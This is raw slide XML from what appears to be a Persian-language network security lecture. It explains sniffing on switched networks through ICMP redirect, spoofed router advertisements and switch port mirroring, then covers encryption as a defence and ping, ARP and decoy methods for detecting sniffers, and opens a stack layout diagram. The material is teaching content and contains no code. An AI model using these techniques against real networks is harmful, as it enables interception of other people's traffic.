                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شنود در شبکه هاي مبتني بر سوئيچ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Striped Right Arrow 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="609600" y="2057400"/>
            <a:ext cx="1219200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>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1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>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219200"/>
            <a:ext cx="8153400" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ICMP (Internet Control Message Protocol)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ICMP redirect</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
              <a:latin typeface="B Nazanin"/>
              <a:cs typeface="B Nazanin"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="B Nazanin"/>
              </a:rPr>
              <a:t>در اين روش به ماشين فرمان داده مي شود که بسته هاي ارسالي خود را در جهت ديگري ارسال کند. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="B Nazanin"/>
              </a:rPr>
              <a:t>يک هکر مي تواند با فرستادن يک </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="B Nazanin"/>
              </a:rPr>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="B Nazanin"/>
              </a:rPr>
              <a:t> و ادعا کردن اينکه بسته هاي ارسالي به مقصد از طريق ماشين مهاجم بهتر است اطلاعات را به دست مي آورد.</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="B Nazanin"/>
            </a:endParaRPr>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428596"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fa-IR" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شنود در شبکه هاي مبتني بر سوئيچ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Striped Right Arrow 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="533400" y="2286000"/>
            <a:ext cx="1219200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>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1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:cs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a-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شنود در شبکه هاي مبتني بر سوئيچ</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:endParaRPr lang="fa-IR" sz="2800" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ICMP router advertisement</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2800" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>دراين اعلان مسيرياب به ساير ماشين ها اعلام مي کند که مسيرياب چه کسي است؟ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> نفوذ گر مي تواند با جعل اين اعلان ادعا کند که مسيرياب است بنابراين ماشين هاي قرباني ترافيک خود را به سمت نفوذ گرارسال مي کنند. </a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2800" dirty="0"/>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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001000" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شنود در شبکه هاي مبتني بر سوئيچ</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1524000"/>
            <a:ext cx="9144000" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:endParaRPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Reconfigure port on switch</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>هر يک از پورت هاي سوئيچ قابليت برنامه ريزي در حالت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“switch port” “mirror”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> را دارند که در اين حالت قادر به دريافت کل يا بخشي از ترافيک شبکه خواهند بود در واقع اين حالت براي کشف خطاهاي شبکه توسط مديران تعبيه شده است که نفوذگر مي تواند با </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> به سوئيچ آنرا در اين حالت پيکر بندي کند </a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" dirty="0"/>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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838200"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>چگونه مي توان جلوي  شنود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>داده را گرفت؟ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRP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fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>برخي از روش هاي شنود غير قابل جلوگيري هستند</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>بهترين دفاع در اين مورد رمز گذاري داده هاست. بنابراين زماني که داده ها شنود مي شوند قابل خواندن نيستند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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1219200" y="0"/>
            <a:ext cx="7268304" cy="914400"/>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a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1295400"/>
            <a:ext cx="7741236" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Ping method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Ping the suspected host with its IP address, but with a different MAC address. If you receive a reply, that means the suspected host is sniffing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Send an ARP request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>the IP address of the suspected host, but to a non-broadcast  MAC address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The Decoy method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Transmits faked plain-text username/password over the network, and alerts when the attacker attempts to logon with such faked username /password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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49</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>ساختمان پشته در هنگام اجراي برنامه ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2286000"/>
            <a:ext cx="3200400" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="3276600"/>
            <a:ext cx="3200400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14352" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2633246"/>
            <a:ext cx="2035942" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Function Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14353" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="3810000"/>
            <a:ext cx="3200400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5751887" y="3395246"/>
            <a:ext cx="1563313" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14355" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3928646"/>
            <a:ext cx="2052165" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Saved Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14356" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="4419600"/>
            <a:ext cx="3200400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14357" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="4800600"/>
            <a:ext cx="1518557" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Local Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14341" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8305800" y="2667000"/>
            <a:ext cx="0" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14342" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7311232" y="4042568"/>
            <a:ext cx="2660650" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Higher Memory Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14343" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1676400"/>
            <a:ext cx="2735209" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
